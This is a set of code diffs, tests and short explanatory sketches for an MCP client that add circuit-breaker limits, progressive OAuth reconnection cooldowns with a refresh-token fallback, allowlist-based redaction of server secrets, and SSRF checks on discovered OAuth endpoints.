expect(redacted.inspectionFailed).toBe(false);
expect(redacted.customUserVars).toEqual(config.customUserVars);
});
it('should pass URLs through unchanged', () => {
const config: ParsedServerConfig = {
type: 'sse',
url: 'https://mcp.example.com/sse?param=value',
};
const redacted = redactServerSecrets(config);
expect(redacted.url).toBe('https://mcp.example.com/sse?param=value');
});
it('should only include explicitly allowlisted fields', () => {
const config: ParsedServerConfig = {
type: 'sse',
url: 'https://example.com/mcp',
title: 'Test',
};
(config as Record<string, unknown>).someNewSensitiveField = 'leaked-value';
const redacted = redactServerSecrets(config);
expect((redacted as Record<string, unknown>).someNewSensitiveField).toBeUndefined();
expect(redacted.title).toBe('Test');
});
});
describe('redactAllServerSecrets', () => {
it('should redact secrets from all configs in the map', () => {
const configs: Record<string, ParsedServerConfig> = {
'server-a': {
type: 'sse',
url: 'https://a.com/mcp',
apiKey: { source: 'admin', authorization_type: 'bearer', key: 'key-a' },
},
'server-b': {
type: 'sse',
url: 'https://b.com/mcp',
oauth: { client_id: 'cid-b', client_secret: 'secret-b' },
},
'server-c': {
type: 'stdio',
command: 'node',
args: ['c.js'],
},
};
const redacted = redactAllServerSecrets(configs);
expect(redacted['server-a'].apiKey?.key).toBeUndefined();
expect(redacted['server-a'].apiKey?.source).toBe('admin');
expect(redacted['server-b'].oauth?.client_secret).toBeUndefined();
expect(redacted['server-b'].oauth?.client_id).toBe('cid-b');
expect((redacted['server-c'] as Record<string, unknown>).command).toBeUndefined();
});
});
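The allowlist approach these tests verify can be sketched as follows: copy only known-safe fields into the result, so any field added later is excluded by default rather than leaked. This is a hedged, self-contained approximation; the field names are taken from the tests above, and the real `redactServerSecrets` handles more fields.

```typescript
interface SketchConfig {
  type: string;
  url?: string;
  title?: string;
  apiKey?: { source: string; authorization_type: string; key?: string };
  [k: string]: unknown;
}

function redactSketch(config: SketchConfig): SketchConfig {
  // Allowlist: only explicitly named fields are copied over.
  const safe: SketchConfig = { type: config.type, url: config.url, title: config.title };
  if (config.apiKey) {
    // Keep the metadata (source, authorization_type), drop the secret itself.
    const { key: _key, ...rest } = config.apiKey;
    safe.apiKey = rest;
  }
  return safe;
}

const redacted = redactSketch({
  type: 'sse',
  url: 'https://example.com/mcp',
  apiKey: { source: 'admin', authorization_type: 'bearer', key: 'secret' },
  someNewSensitiveField: 'leaked-value', // not allowlisted: silently dropped
});
console.log(redacted.apiKey?.key, redacted.someNewSensitiveField); // undefined undefined
```

The design choice matters for safety: a denylist would leak any newly introduced secret field, while an allowlist fails closed, which is what the "should only include explicitly allowlisted fields" test pins down.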


@@ -71,6 +71,17 @@ const FIVE_MINUTES = 5 * 60 * 1000;
const DEFAULT_TIMEOUT = 60000;
/** SSE connections through proxies may need longer initial handshake time */
const SSE_CONNECT_TIMEOUT = 120000;
const DEFAULT_INIT_TIMEOUT = 30000;
interface CircuitBreakerState {
cycleCount: number;
cycleWindowStart: number;
cooldownUntil: number;
failedRounds: number;
failedWindowStart: number;
failedBackoffUntil: number;
}
/** Default body timeout for Streamable HTTP GET SSE streams that idle between server pushes */
const DEFAULT_SSE_READ_TIMEOUT = FIVE_MINUTES;
@@ -262,6 +273,7 @@ export class MCPConnection extends EventEmitter {
private oauthTokens?: MCPOAuthTokens | null;
private requestHeaders?: Record<string, string> | null;
private oauthRequired = false;
private oauthRecovery = false;
private readonly useSSRFProtection: boolean;
iconPath?: string;
timeout?: number;
@@ -274,6 +286,88 @@ export class MCPConnection extends EventEmitter {
*/
public readonly createdAt: number;
private static circuitBreakers: Map<string, CircuitBreakerState> = new Map();
public static clearCooldown(serverName: string): void {
MCPConnection.circuitBreakers.delete(serverName);
logger.debug(`[MCP][${serverName}] Circuit breaker state cleared`);
}
private getCircuitBreaker(): CircuitBreakerState {
let cb = MCPConnection.circuitBreakers.get(this.serverName);
if (!cb) {
cb = {
cycleCount: 0,
cycleWindowStart: Date.now(),
cooldownUntil: 0,
failedRounds: 0,
failedWindowStart: Date.now(),
failedBackoffUntil: 0,
};
MCPConnection.circuitBreakers.set(this.serverName, cb);
}
return cb;
}
private isCircuitOpen(): boolean {
const cb = this.getCircuitBreaker();
const now = Date.now();
return now < cb.cooldownUntil || now < cb.failedBackoffUntil;
}
private recordCycle(): void {
const cb = this.getCircuitBreaker();
const now = Date.now();
if (now - cb.cycleWindowStart > mcpConfig.CB_CYCLE_WINDOW_MS) {
cb.cycleCount = 0;
cb.cycleWindowStart = now;
}
cb.cycleCount++;
if (cb.cycleCount >= mcpConfig.CB_MAX_CYCLES) {
cb.cooldownUntil = now + mcpConfig.CB_CYCLE_COOLDOWN_MS;
cb.cycleCount = 0;
cb.cycleWindowStart = now;
logger.warn(
`${this.getLogPrefix()} Circuit breaker: too many cycles, cooling down for ${mcpConfig.CB_CYCLE_COOLDOWN_MS}ms`,
);
}
}
private recordFailedRound(): void {
const cb = this.getCircuitBreaker();
const now = Date.now();
if (now - cb.failedWindowStart > mcpConfig.CB_FAILED_WINDOW_MS) {
cb.failedRounds = 0;
cb.failedWindowStart = now;
}
cb.failedRounds++;
if (cb.failedRounds >= mcpConfig.CB_MAX_FAILED_ROUNDS) {
const backoff = Math.min(
mcpConfig.CB_BASE_BACKOFF_MS *
Math.pow(2, cb.failedRounds - mcpConfig.CB_MAX_FAILED_ROUNDS),
mcpConfig.CB_MAX_BACKOFF_MS,
);
cb.failedBackoffUntil = now + backoff;
logger.warn(
`${this.getLogPrefix()} Circuit breaker: too many failures, backing off for ${backoff}ms`,
);
}
}
private resetFailedRounds(): void {
const cb = this.getCircuitBreaker();
cb.failedRounds = 0;
cb.failedWindowStart = Date.now();
cb.failedBackoffUntil = 0;
}
public static decrementCycleCount(serverName: string): void {
const cb = MCPConnection.circuitBreakers.get(serverName);
if (cb && cb.cycleCount > 0) {
cb.cycleCount--;
}
}
setRequestHeaders(headers: Record<string, string> | null): void {
if (!headers) {
return;
@@ -686,6 +780,12 @@ export class MCPConnection extends EventEmitter {
return;
}
if (this.isCircuitOpen()) {
this.connectionState = 'error';
this.emit('connectionChange', 'error');
throw new Error(`${this.getLogPrefix()} Circuit breaker is open, connection attempt blocked`);
}
this.emit('connectionChange', 'connecting');
this.connectPromise = (async () => {
@@ -703,7 +803,7 @@ export class MCPConnection extends EventEmitter {
this.transport = await runOutsideTracing(() => this.constructTransport(this.options));
this.patchTransportSend();
-const connectTimeout = this.options.initTimeout ?? 120000;
+const connectTimeout = this.options.initTimeout ?? DEFAULT_INIT_TIMEOUT;
await runOutsideTracing(() =>
withTimeout(
this.client.connect(this.transport!),
@@ -716,6 +816,14 @@ export class MCPConnection extends EventEmitter {
this.connectionState = 'connected';
this.emit('connectionChange', 'connected');
this.reconnectAttempts = 0;
this.resetFailedRounds();
if (this.oauthRecovery) {
MCPConnection.decrementCycleCount(this.serverName);
this.oauthRecovery = false;
logger.debug(
`${this.getLogPrefix()} OAuth recovery: decremented cycle count after successful reconnect`,
);
}
} catch (error) {
// Check if it's a rate limit error - stop immediately to avoid making it worse
if (this.isRateLimitError(error)) {
@@ -799,9 +907,8 @@ export class MCPConnection extends EventEmitter {
try {
// Wait for OAuth to be handled
await oauthHandledPromise;
-// Reset the oauthRequired flag
this.oauthRequired = false;
-// Don't throw the error - just return so connection can be retried
+this.oauthRecovery = true;
logger.info(
`${this.getLogPrefix()} OAuth handled successfully, connection will be retried`,
);
@@ -817,6 +924,7 @@ export class MCPConnection extends EventEmitter {
this.connectionState = 'error';
this.emit('connectionChange', 'error');
+this.recordFailedRound();
throw error;
} finally {
this.connectPromise = null;
@@ -866,7 +974,8 @@ export class MCPConnection extends EventEmitter {
async connect(): Promise<void> {
try {
-await this.disconnect();
+// preserve cycle tracking across reconnects so the circuit breaker can detect rapid cycling
+await this.disconnect(false);
await this.connectClient();
if (!(await this.isConnected())) {
throw new Error('Connection not established');
@@ -906,7 +1015,7 @@ export class MCPConnection extends EventEmitter {
isTransient,
} = extractSSEErrorMessage(error);
-if (errorCode === 404) {
+if (errorCode === 400 || errorCode === 404 || errorCode === 405) {
const hasSession =
'sessionId' in transport &&
(transport as { sessionId?: string }).sessionId != null &&
@@ -914,14 +1023,14 @@ export class MCPConnection extends EventEmitter {
if (!hasSession && errorMessage.toLowerCase().includes('failed to open sse stream')) {
logger.warn(
-`${this.getLogPrefix()} SSE stream not available (404), no session. Ignoring.`,
+`${this.getLogPrefix()} SSE stream not available (${errorCode}), no session. Ignoring.`,
);
return;
}
if (hasSession) {
logger.warn(
-`${this.getLogPrefix()} 404 with active session — session lost, triggering reconnection.`,
+`${this.getLogPrefix()} ${errorCode} with active session — session lost, triggering reconnection.`,
);
}
}
@@ -992,7 +1101,7 @@ export class MCPConnection extends EventEmitter {
await Promise.all(closing);
}
-public async disconnect(): Promise<void> {
+public async disconnect(resetCycleTracking = true): Promise<void> {
try {
if (this.transport) {
await this.client.close();
@@ -1006,6 +1115,9 @@ export class MCPConnection extends EventEmitter {
this.emit('connectionChange', 'disconnected');
} finally {
this.connectPromise = null;
+if (!resetCycleTracking) {
+this.recordCycle();
+}
}
}


@@ -12,4 +12,18 @@ export const mcpConfig = {
USER_CONNECTION_IDLE_TIMEOUT: math(
process.env.MCP_USER_CONNECTION_IDLE_TIMEOUT ?? 15 * 60 * 1000,
),
/** Max connect/disconnect cycles before the circuit breaker trips. Default: 7 */
CB_MAX_CYCLES: math(process.env.MCP_CB_MAX_CYCLES ?? 7),
/** Sliding window (ms) for counting cycles. Default: 45s */
CB_CYCLE_WINDOW_MS: math(process.env.MCP_CB_CYCLE_WINDOW_MS ?? 45_000),
/** Cooldown (ms) after the cycle breaker trips. Default: 15s */
CB_CYCLE_COOLDOWN_MS: math(process.env.MCP_CB_CYCLE_COOLDOWN_MS ?? 15_000),
/** Max consecutive failed connection rounds before backoff. Default: 3 */
CB_MAX_FAILED_ROUNDS: math(process.env.MCP_CB_MAX_FAILED_ROUNDS ?? 3),
/** Sliding window (ms) for counting failed rounds. Default: 120s */
CB_FAILED_WINDOW_MS: math(process.env.MCP_CB_FAILED_WINDOW_MS ?? 120_000),
/** Base backoff (ms) after failed round threshold is reached. Default: 30s */
CB_BASE_BACKOFF_MS: math(process.env.MCP_CB_BASE_BACKOFF_MS ?? 30_000),
/** Max backoff cap (ms) for exponential backoff. Default: 300s */
CB_MAX_BACKOFF_MS: math(process.env.MCP_CB_MAX_BACKOFF_MS ?? 300_000),
};
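The cycle-window bookkeeping that these settings drive (see `recordCycle` in the connection diff above) can be sketched as a pure function. Time is injected for clarity; the real code reads `Date.now()` and the constants below are the documented defaults, inlined as assumptions:

```typescript
// Sketch of the sliding cycle window: 7 cycles inside a 45s window trips a
// 15s cooldown. Constants mirror the documented defaults, not real imports.
const MAX_CYCLES = 7;
const CYCLE_WINDOW_MS = 45_000;
const CYCLE_COOLDOWN_MS = 15_000;

interface CycleState {
  cycleCount: number;
  cycleWindowStart: number;
  cooldownUntil: number;
}

function recordCycle(state: CycleState, now: number): CycleState {
  let { cycleCount, cycleWindowStart, cooldownUntil } = state;
  if (now - cycleWindowStart > CYCLE_WINDOW_MS) {
    cycleCount = 0; // window expired: start counting afresh
    cycleWindowStart = now;
  }
  cycleCount++;
  if (cycleCount >= MAX_CYCLES) {
    cooldownUntil = now + CYCLE_COOLDOWN_MS; // trip the breaker
    cycleCount = 0;
    cycleWindowStart = now;
  }
  return { cycleCount, cycleWindowStart, cooldownUntil };
}

let s: CycleState = { cycleCount: 0, cycleWindowStart: 0, cooldownUntil: 0 };
for (let i = 0; i < 7; i++) {
  s = recordCycle(s, 1_000 * i); // 7 rapid cycles, one second apart
}
console.log(s.cooldownUntil > 0); // breaker tripped
```

Cycles spread out over more than the window simply restart the count, so only genuinely rapid connect/disconnect churn trips the breaker.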


@@ -253,17 +253,21 @@ describe('OAuthReconnectionManager', () => {
expect(mockMCPManager.disconnectUserConnection).toHaveBeenCalledWith(userId, 'server1');
});
-it('should not reconnect servers with expired tokens', async () => {
+it('should not reconnect servers with expired tokens and no refresh token', async () => {
const userId = 'user-123';
const oauthServers = new Set(['server1']);
(mockRegistryInstance.getOAuthServers as jest.Mock).mockResolvedValue(oauthServers);
-// server1: has expired token
-tokenMethods.findToken.mockResolvedValue({
-userId,
-identifier: 'mcp:server1',
-expiresAt: new Date(Date.now() - 3600000), // 1 hour ago
-} as unknown as MCPOAuthTokens);
+tokenMethods.findToken.mockImplementation(async ({ identifier }) => {
+if (identifier === 'mcp:server1') {
+return {
+userId,
+identifier,
+expiresAt: new Date(Date.now() - 3600000),
+} as unknown as MCPOAuthTokens;
+}
+return null;
+});
await reconnectionManager.reconnectServers(userId);
@@ -272,6 +276,87 @@ describe('OAuthReconnectionManager', () => {
expect(mockMCPManager.getUserConnection).not.toHaveBeenCalled();
});
it('should reconnect servers with expired access token but valid refresh token', async () => {
const userId = 'user-123';
const oauthServers = new Set(['server1']);
(mockRegistryInstance.getOAuthServers as jest.Mock).mockResolvedValue(oauthServers);
tokenMethods.findToken.mockImplementation(async ({ identifier }) => {
if (identifier === 'mcp:server1') {
return {
userId,
identifier,
expiresAt: new Date(Date.now() - 3600000),
} as unknown as MCPOAuthTokens;
}
if (identifier === 'mcp:server1:refresh') {
return {
userId,
identifier,
} as unknown as MCPOAuthTokens;
}
return null;
});
const mockNewConnection = {
isConnected: jest.fn().mockResolvedValue(true),
disconnect: jest.fn(),
};
mockMCPManager.getUserConnection.mockResolvedValue(
mockNewConnection as unknown as MCPConnection,
);
(mockRegistryInstance.getServerConfig as jest.Mock).mockResolvedValue(
{} as unknown as MCPOptions,
);
await reconnectionManager.reconnectServers(userId);
expect(reconnectionTracker.isActive(userId, 'server1')).toBe(true);
await new Promise((resolve) => setTimeout(resolve, 100));
expect(mockMCPManager.getUserConnection).toHaveBeenCalledWith(
expect.objectContaining({ serverName: 'server1' }),
);
});
it('should reconnect when access token is TTL-deleted but refresh token exists', async () => {
const userId = 'user-123';
const oauthServers = new Set(['server1']);
(mockRegistryInstance.getOAuthServers as jest.Mock).mockResolvedValue(oauthServers);
tokenMethods.findToken.mockImplementation(async ({ identifier }) => {
if (identifier === 'mcp:server1:refresh') {
return {
userId,
identifier,
} as unknown as MCPOAuthTokens;
}
return null;
});
const mockNewConnection = {
isConnected: jest.fn().mockResolvedValue(true),
disconnect: jest.fn(),
};
mockMCPManager.getUserConnection.mockResolvedValue(
mockNewConnection as unknown as MCPConnection,
);
(mockRegistryInstance.getServerConfig as jest.Mock).mockResolvedValue(
{} as unknown as MCPOptions,
);
await reconnectionManager.reconnectServers(userId);
expect(reconnectionTracker.isActive(userId, 'server1')).toBe(true);
await new Promise((resolve) => setTimeout(resolve, 100));
expect(mockMCPManager.getUserConnection).toHaveBeenCalledWith(
expect.objectContaining({ serverName: 'server1' }),
);
});
it('should handle connection that returns but is not connected', async () => {
const userId = 'user-123';
const oauthServers = new Set(['server1']);
@@ -336,6 +421,69 @@ describe('OAuthReconnectionManager', () => {
});
});
describe('reconnectServer', () => {
let reconnectionTracker: OAuthReconnectionTracker;
beforeEach(async () => {
reconnectionTracker = new OAuthReconnectionTracker();
reconnectionManager = await OAuthReconnectionManager.createInstance(
flowManager,
tokenMethods,
reconnectionTracker,
);
});
it('should return true on successful reconnection', async () => {
const userId = 'user-123';
const serverName = 'server1';
const mockConnection = {
isConnected: jest.fn().mockResolvedValue(true),
disconnect: jest.fn(),
};
mockMCPManager.getUserConnection.mockResolvedValue(
mockConnection as unknown as MCPConnection,
);
(mockRegistryInstance.getServerConfig as jest.Mock).mockResolvedValue(
{} as unknown as MCPOptions,
);
const result = await reconnectionManager.reconnectServer(userId, serverName);
expect(result).toBe(true);
});
it('should return false on failed reconnection', async () => {
const userId = 'user-123';
const serverName = 'server1';
mockMCPManager.getUserConnection.mockRejectedValue(new Error('Connection failed'));
(mockRegistryInstance.getServerConfig as jest.Mock).mockResolvedValue(
{} as unknown as MCPOptions,
);
const result = await reconnectionManager.reconnectServer(userId, serverName);
expect(result).toBe(false);
});
it('should return false when MCPManager is not available', async () => {
const userId = 'user-123';
const serverName = 'server1';
(OAuthReconnectionManager as unknown as { instance: null }).instance = null;
(MCPManager.getInstance as jest.Mock).mockImplementation(() => {
throw new Error('MCPManager has not been initialized.');
});
const managerWithoutMCP = await OAuthReconnectionManager.createInstance(
flowManager,
tokenMethods,
reconnectionTracker,
);
const result = await managerWithoutMCP.reconnectServer(userId, serverName);
expect(result).toBe(false);
});
});
describe('reconnection staggering', () => {
let reconnectionTracker: OAuthReconnectionTracker;


@@ -96,6 +96,24 @@ export class OAuthReconnectionManager {
}
}
/**
* Attempts to reconnect a single OAuth MCP server.
* @returns true if reconnection succeeded, false otherwise.
*/
public async reconnectServer(userId: string, serverName: string): Promise<boolean> {
if (this.mcpManager == null) {
return false;
}
this.reconnectionsTracker.setActive(userId, serverName);
try {
await this.tryReconnect(userId, serverName);
return !this.reconnectionsTracker.isFailed(userId, serverName);
} catch {
return false;
}
}
public clearReconnection(userId: string, serverName: string) {
this.reconnectionsTracker.removeFailed(userId, serverName);
this.reconnectionsTracker.removeActive(userId, serverName);
@@ -174,23 +192,31 @@ export class OAuthReconnectionManager {
}
}
-// if the server has no tokens for the user, don't attempt to reconnect
+// if the server has a valid (non-expired) access token, allow reconnect
const accessToken = await this.tokenMethods.findToken({
userId,
type: 'mcp_oauth',
identifier: `mcp:${serverName}`,
});
-if (accessToken == null) {
-return false;
-}
-// if the token has expired, don't attempt to reconnect
+if (accessToken != null) {
const now = new Date();
-if (accessToken.expiresAt && accessToken.expiresAt < now) {
+if (!accessToken.expiresAt || accessToken.expiresAt >= now) {
+return true;
+}
+}
+// if the access token is expired or TTL-deleted, fall back to refresh token
+const refreshToken = await this.tokenMethods.findToken({
+userId,
+type: 'mcp_oauth',
+identifier: `mcp:${serverName}:refresh`,
+});
+if (refreshToken == null) {
return false;
}
-// …otherwise, we're good to go with the reconnect attempt
return true;
}
}
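The access-token/refresh-token gate above reduces to a small pure function. The `TokenRecord` shape below is a hypothetical minimum for illustration; the real code queries `tokenMethods.findToken` with the `mcp:<server>` and `mcp:<server>:refresh` identifiers:

```typescript
// Hypothetical minimal token shape; the real token model carries more fields.
interface TokenRecord {
  expiresAt?: Date;
}

/**
 * Mirrors the reconnect gate: a live (or non-expiring) access token allows
 * reconnect; otherwise a refresh token must exist to fall back on.
 */
function canReconnect(
  accessToken: TokenRecord | null,
  refreshToken: TokenRecord | null,
  now: Date = new Date(),
): boolean {
  if (accessToken != null) {
    if (!accessToken.expiresAt || accessToken.expiresAt >= now) {
      return true;
    }
  }
  return refreshToken != null;
}

const refNow = new Date('2026-01-01T00:00:00Z');
const expired = { expiresAt: new Date(refNow.getTime() - 3_600_000) };
console.log(canReconnect(expired, null, refNow)); // false: expired, no refresh
console.log(canReconnect(expired, {}, refNow)); // true: refresh token available
console.log(canReconnect(null, {}, refNow)); // true: access TTL-deleted, refresh exists
```

The third case is the TTL-deletion scenario the new tests cover: the access token document is gone entirely, yet the stored refresh token still justifies a reconnect attempt.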


@@ -397,6 +397,101 @@ describe('OAuthReconnectTracker', () => {
});
});
describe('cooldown-based retry', () => {
beforeEach(() => {
jest.useFakeTimers();
});
afterEach(() => {
jest.useRealTimers();
});
it('should return true from isFailed within first cooldown period (5 min)', () => {
const now = Date.now();
jest.setSystemTime(now);
tracker.setFailed(userId, serverName);
expect(tracker.isFailed(userId, serverName)).toBe(true);
jest.advanceTimersByTime(4 * 60 * 1000);
expect(tracker.isFailed(userId, serverName)).toBe(true);
});
it('should return false from isFailed after first cooldown elapses (5 min)', () => {
const now = Date.now();
jest.setSystemTime(now);
tracker.setFailed(userId, serverName);
expect(tracker.isFailed(userId, serverName)).toBe(true);
jest.advanceTimersByTime(5 * 60 * 1000);
expect(tracker.isFailed(userId, serverName)).toBe(false);
});
it('should use progressive cooldown schedule (5m, 10m, 20m, 30m)', () => {
const now = Date.now();
jest.setSystemTime(now);
// First failure: 5 min cooldown
tracker.setFailed(userId, serverName);
jest.advanceTimersByTime(5 * 60 * 1000);
expect(tracker.isFailed(userId, serverName)).toBe(false);
// Second failure: 10 min cooldown
tracker.setFailed(userId, serverName);
jest.advanceTimersByTime(9 * 60 * 1000);
expect(tracker.isFailed(userId, serverName)).toBe(true);
jest.advanceTimersByTime(1 * 60 * 1000);
expect(tracker.isFailed(userId, serverName)).toBe(false);
// Third failure: 20 min cooldown
tracker.setFailed(userId, serverName);
jest.advanceTimersByTime(19 * 60 * 1000);
expect(tracker.isFailed(userId, serverName)).toBe(true);
jest.advanceTimersByTime(1 * 60 * 1000);
expect(tracker.isFailed(userId, serverName)).toBe(false);
// Fourth failure: 30 min cooldown
tracker.setFailed(userId, serverName);
jest.advanceTimersByTime(29 * 60 * 1000);
expect(tracker.isFailed(userId, serverName)).toBe(true);
jest.advanceTimersByTime(1 * 60 * 1000);
expect(tracker.isFailed(userId, serverName)).toBe(false);
});
it('should cap cooldown at 30 min for attempts beyond 4', () => {
const now = Date.now();
jest.setSystemTime(now);
for (let i = 0; i < 5; i++) {
tracker.setFailed(userId, serverName);
jest.advanceTimersByTime(30 * 60 * 1000);
}
tracker.setFailed(userId, serverName);
jest.advanceTimersByTime(29 * 60 * 1000);
expect(tracker.isFailed(userId, serverName)).toBe(true);
jest.advanceTimersByTime(1 * 60 * 1000);
expect(tracker.isFailed(userId, serverName)).toBe(false);
});
it('should fully reset metadata on removeFailed', () => {
const now = Date.now();
jest.setSystemTime(now);
tracker.setFailed(userId, serverName);
tracker.setFailed(userId, serverName);
tracker.setFailed(userId, serverName);
tracker.removeFailed(userId, serverName);
expect(tracker.isFailed(userId, serverName)).toBe(false);
tracker.setFailed(userId, serverName);
jest.advanceTimersByTime(5 * 60 * 1000);
expect(tracker.isFailed(userId, serverName)).toBe(false);
});
});
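The schedule these tests exercise is a simple lookup capped at the last entry. A minimal sketch of that lookup, with the 5m/10m/20m/30m values from the tests:

```typescript
// Progressive cooldown schedule matching the tests above: 5m, 10m, 20m,
// then a 30m cap for every attempt beyond the fourth.
const SCHEDULE_MS = [5, 10, 20, 30].map((minutes) => minutes * 60 * 1000);

/** Cooldown for the nth consecutive failure (attempts >= 1). */
function cooldownForAttempt(attempts: number): number {
  const idx = Math.min(attempts - 1, SCHEDULE_MS.length - 1);
  return SCHEDULE_MS[idx];
}

console.log(cooldownForAttempt(1) / 60_000); // 5
console.log(cooldownForAttempt(4) / 60_000); // 30
console.log(cooldownForAttempt(9) / 60_000); // still 30 (capped)
```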
describe('timestamp tracking edge cases', () => {
beforeEach(() => {
jest.useFakeTimers();


@@ -1,6 +1,12 @@
interface FailedMeta {
attempts: number;
lastFailedAt: number;
}
const COOLDOWN_SCHEDULE_MS = [5 * 60 * 1000, 10 * 60 * 1000, 20 * 60 * 1000, 30 * 60 * 1000];
export class OAuthReconnectionTracker {
-/** Map of userId -> Set of serverNames that have failed reconnection */
-private failed: Map<string, Set<string>> = new Map();
+private failedMeta: Map<string, Map<string, FailedMeta>> = new Map();
/** Map of userId -> Set of serverNames that are actively reconnecting */
private active: Map<string, Set<string>> = new Map();
/** Map of userId:serverName -> timestamp when reconnection started */
@@ -9,7 +15,17 @@ export class OAuthReconnectionTracker {
private readonly RECONNECTION_TIMEOUT_MS = 3 * 60 * 1000; // 3 minutes
public isFailed(userId: string, serverName: string): boolean {
-return this.failed.get(userId)?.has(serverName) ?? false;
+const meta = this.failedMeta.get(userId)?.get(serverName);
+if (!meta) {
+return false;
+}
+const idx = Math.min(meta.attempts - 1, COOLDOWN_SCHEDULE_MS.length - 1);
+const cooldown = COOLDOWN_SCHEDULE_MS[idx];
+const elapsed = Date.now() - meta.lastFailedAt;
+if (elapsed >= cooldown) {
+return false;
+}
+return true;
}
/** Check if server is in the active set (original simple check) */
@@ -48,11 +64,15 @@ export class OAuthReconnectionTracker {
}
public setFailed(userId: string, serverName: string): void {
-if (!this.failed.has(userId)) {
-this.failed.set(userId, new Set());
+if (!this.failedMeta.has(userId)) {
+this.failedMeta.set(userId, new Map());
}
-this.failed.get(userId)?.add(serverName);
+const userMap = this.failedMeta.get(userId)!;
+const existing = userMap.get(serverName);
+userMap.set(serverName, {
+attempts: (existing?.attempts ?? 0) + 1,
+lastFailedAt: Date.now(),
+});
}
public setActive(userId: string, serverName: string): void {
@@ -68,10 +88,10 @@ export class OAuthReconnectionTracker {
}
public removeFailed(userId: string, serverName: string): void {
-const userServers = this.failed.get(userId);
-userServers?.delete(serverName);
-if (userServers?.size === 0) {
-this.failed.delete(userId);
+const userMap = this.failedMeta.get(userId);
+userMap?.delete(serverName);
+if (userMap?.size === 0) {
+this.failedMeta.delete(userId);
}
}
@@ -94,7 +114,7 @@ export class OAuthReconnectionTracker {
activeTimestamps: number;
} {
return {
-usersWithFailedServers: this.failed.size,
+usersWithFailedServers: this.failedMeta.size,
usersWithActiveReconnections: this.active.size,
activeTimestamps: this.activeTimestamps.size,
};


@@ -24,6 +24,7 @@ import {
selectRegistrationAuthMethod,
inferClientAuthMethod,
} from './methods';
import { isSSRFTarget, resolveHostnameSSRF } from '~/auth';
import { sanitizeUrlForLogging } from '~/mcp/utils';
/** Type for the OAuth metadata from the SDK */
@@ -144,7 +145,9 @@ export class MCPOAuthHandler {
resourceMetadata = await discoverOAuthProtectedResourceMetadata(serverUrl, {}, fetchFn);
if (resourceMetadata?.authorization_servers?.length) {
-authServerUrl = new URL(resourceMetadata.authorization_servers[0]);
+const discoveredAuthServer = resourceMetadata.authorization_servers[0];
+await this.validateOAuthUrl(discoveredAuthServer, 'authorization_server');
+authServerUrl = new URL(discoveredAuthServer);
logger.debug(
`[MCPOAuth] Found authorization server from resource metadata: ${authServerUrl}`,
);
@@ -161,20 +164,7 @@ export class MCPOAuthHandler {
logger.debug(
`[MCPOAuth] Discovering OAuth metadata from ${sanitizeUrlForLogging(authServerUrl)}`,
);
-let rawMetadata = await discoverAuthorizationServerMetadata(authServerUrl, {
-fetchFn,
-});
-// If discovery failed and we're using a path-based URL, try the base URL
-if (!rawMetadata && authServerUrl.pathname !== '/') {
-const baseUrl = new URL(authServerUrl.origin);
-logger.debug(
-`[MCPOAuth] Discovery failed with path, trying base URL: ${sanitizeUrlForLogging(baseUrl)}`,
-);
-rawMetadata = await discoverAuthorizationServerMetadata(baseUrl, {
-fetchFn,
-});
-}
+const rawMetadata = await this.discoverWithOriginFallback(authServerUrl, fetchFn);
if (!rawMetadata) {
/**
@@ -213,6 +203,19 @@ export class MCPOAuthHandler {
logger.debug(`[MCPOAuth] OAuth metadata discovered successfully`);
const metadata = await OAuthMetadataSchema.parseAsync(rawMetadata);
const endpointChecks: Promise<void>[] = [];
if (metadata.registration_endpoint) {
endpointChecks.push(
this.validateOAuthUrl(metadata.registration_endpoint, 'registration_endpoint'),
);
}
if (metadata.token_endpoint) {
endpointChecks.push(this.validateOAuthUrl(metadata.token_endpoint, 'token_endpoint'));
}
if (endpointChecks.length > 0) {
await Promise.all(endpointChecks);
}
logger.debug(`[MCPOAuth] OAuth metadata parsed successfully`);
return {
metadata: metadata as unknown as OAuthMetadata,
@@ -221,6 +224,39 @@ export class MCPOAuthHandler {
};
}
/**
* Discovers OAuth authorization server metadata, retrying with just the origin
* when discovery fails for a path-based URL. Shared implementation used by
* `discoverMetadata` and both `refreshOAuthTokens` branches.
*/
private static async discoverWithOriginFallback(
serverUrl: URL,
fetchFn: FetchLike,
): ReturnType<typeof discoverAuthorizationServerMetadata> {
let metadata: Awaited<ReturnType<typeof discoverAuthorizationServerMetadata>>;
try {
metadata = await discoverAuthorizationServerMetadata(serverUrl, { fetchFn });
} catch (err) {
if (serverUrl.pathname === '/') {
throw err;
}
const baseUrl = new URL(serverUrl.origin);
logger.debug(
`[MCPOAuth] Discovery threw for path URL, trying base URL: ${sanitizeUrlForLogging(baseUrl)}`,
{ error: err },
);
return discoverAuthorizationServerMetadata(baseUrl, { fetchFn });
}
if (!metadata && serverUrl.pathname !== '/') {
const baseUrl = new URL(serverUrl.origin);
logger.debug(
`[MCPOAuth] Discovery failed with path, trying base URL: ${sanitizeUrlForLogging(baseUrl)}`,
);
return discoverAuthorizationServerMetadata(baseUrl, { fetchFn });
}
return metadata;
}
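The try-full-URL-then-origin order that `discoverWithOriginFallback` implements can be sketched as a pure helper that just enumerates the candidate discovery URLs (a simplification: the real method also distinguishes thrown errors from empty results):

```typescript
/**
 * Sketch of the discovery order: try the full (possibly path-based) URL
 * first, then fall back to the bare origin when the URL has a path.
 * Illustration only; the real code performs the fetches and error handling.
 */
function discoveryCandidates(serverUrl: URL): string[] {
  const candidates = [serverUrl.href];
  if (serverUrl.pathname !== '/') {
    candidates.push(new URL(serverUrl.origin).href);
  }
  return candidates;
}

console.log(discoveryCandidates(new URL('https://auth.example.com/tenant/abc')));
// ['https://auth.example.com/tenant/abc', 'https://auth.example.com/']
console.log(discoveryCandidates(new URL('https://auth.example.com/')));
// ['https://auth.example.com/']
```

This matters for tenant-scoped authorization servers, where metadata may only be published at the origin's well-known path rather than under the tenant path.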
/**
* Registers an OAuth client dynamically
*/
@@ -335,10 +371,14 @@ export class MCPOAuthHandler {
logger.debug(`[MCPOAuth] Generated flowId: ${flowId}, state: ${state}`);
try {
-// Check if we have pre-configured OAuth settings
if (config?.authorization_url && config?.token_url && config?.client_id) {
logger.debug(`[MCPOAuth] Using pre-configured OAuth settings for ${serverName}`);
+await Promise.all([
+this.validateOAuthUrl(config.authorization_url, 'authorization_url'),
+this.validateOAuthUrl(config.token_url, 'token_url'),
+]);
const skipCodeChallengeCheck =
config?.skip_code_challenge_check === true ||
process.env.MCP_SKIP_CODE_CHALLENGE_CHECK === 'true';
@@ -390,10 +430,11 @@ export class MCPOAuthHandler {
code_challenge_methods_supported: codeChallengeMethodsSupported,
};
